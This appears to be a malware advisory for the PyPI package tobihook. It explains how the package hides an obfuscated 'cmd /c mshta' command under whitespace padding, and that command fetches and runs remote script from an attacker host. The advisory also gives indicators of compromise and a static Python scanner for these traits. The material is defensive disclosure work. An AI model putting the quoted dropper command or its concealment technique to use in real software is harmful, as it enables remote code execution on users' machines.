Malicious package

tobihook (PyPI)

Malicious code in tobihook (PyPI). Remove it immediately and rotate any exposed credentials.

MAL-2026-5995
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall tobihook

What this malware does

The package masquerades as an HTTP helper (functions named post/get/fetch, module comment '# request/init.py', and an unused requests dependency) but each of those functions base64-decodes the string 'cmd /c mshta https://quitlag.com' and launches it via subprocess.Popen with CREATE_NO_WINDOW on Windows. mshta.exe then fetches and executes attacker-controlled HTA/JavaScript from quitlag.com on the caller's machine with no visible window. The malicious code is concealed in tobihook/post.py behind roughly 400 lines of leading whitespace and base64 obfuscation, and the dropper is reachable from the package's documented top-level API (tobihook/init.py re-exports post). Any developer who installs tobihook and calls its advertised post()/get()/fetch() triggers remote code execution on a Windows host.

The code contains lightly obfuscated commands that execute remote scripts using the mshta utility. It contains no other functionality, and the target URL is already flagged as potentially dangerous.
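The two concealment traits described above, a base64 string literal that decodes to an mshta command and a long run of blank lines pushing the code out of view, can both be checked statically. The scanner below is an added example, not code from this advisory or from the package; the function names, the blank-run threshold and the constructed samples (which use the placeholder host example.invalid) are assumptions. It parses source with ast and never executes it.

```python
import ast
import base64
import binascii
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
TOKENS = ("mshta", "cmd /c")   # strings named in the advisory text
BLANK_RUN_LIMIT = 100          # assumed threshold for "hidden below the fold"

def longest_blank_run(source):
    """Length of the longest run of whitespace-only lines."""
    best = run = 0
    for line in source.splitlines():
        run = run + 1 if not line.strip() else 0
        best = max(best, run)
    return best

def decoded_hits(source):
    """(lineno, decoded) for literals whose base64 decoding names a token."""
    hits = []
    for node in ast.walk(ast.parse(source)):   # parsed only, never executed
        if not (isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes))):
            continue
        raw = node.value
        text = (raw if isinstance(raw, str) else raw.decode("latin-1")).strip()
        if not B64_RE.fullmatch(text):
            continue
        try:
            decoded = base64.b64decode(text, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
        if any(t in decoded.lower() for t in TOKENS):
            hits.append((node.lineno, decoded))
    return hits

def scan(source):
    run = longest_blank_run(source)
    return {"blank_run": run, "padded": run >= BLANK_RUN_LIMIT, "hits": decoded_hits(source)}

# Constructed samples: inert string literals, placeholder host, nothing is launched.
_ENC = base64.b64encode(b"cmd /c mshta https://example.invalid").decode()
SAMPLE = "# helper\n" + "\n" * 400 + f"def post(url):\n    blob = '{_ENC}'\n    return blob\n"
_OK = base64.b64encode(b"hello world, hello!").decode()
BENIGN = f"def post(url):\n    token = '{_OK}'\n    return token\n"

if __name__ == "__main__":
    for name, src in (("SAMPLE", SAMPLE), ("BENIGN", BENIGN)):
        print(name, scan(src))
```

Run it over unpacked sdist or wheel contents before installation; a hit on either trait is a reason to review the file by hand, not a verdict on its own.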

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-tobihook

Reasons (based on the campaign):

  • Downloads and executes a remote malicious script.

  • tool:mshta

  • obfuscation

Malicious versions

1 flagged
1.0.4

Indicators of compromise (SHA-256)

2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb
052494dbc6267dbb289d7f0459188ecce627e3c3eb1d7a8892795003ff8bff53

Frequently asked questions

No. tobihook on PyPI has been identified as a malicious package (version 1.0.4 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006881 2026-06-tobihook

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · analyst

tobihook (PyPI) malicious package — MAL-2026-5995 | O3 Security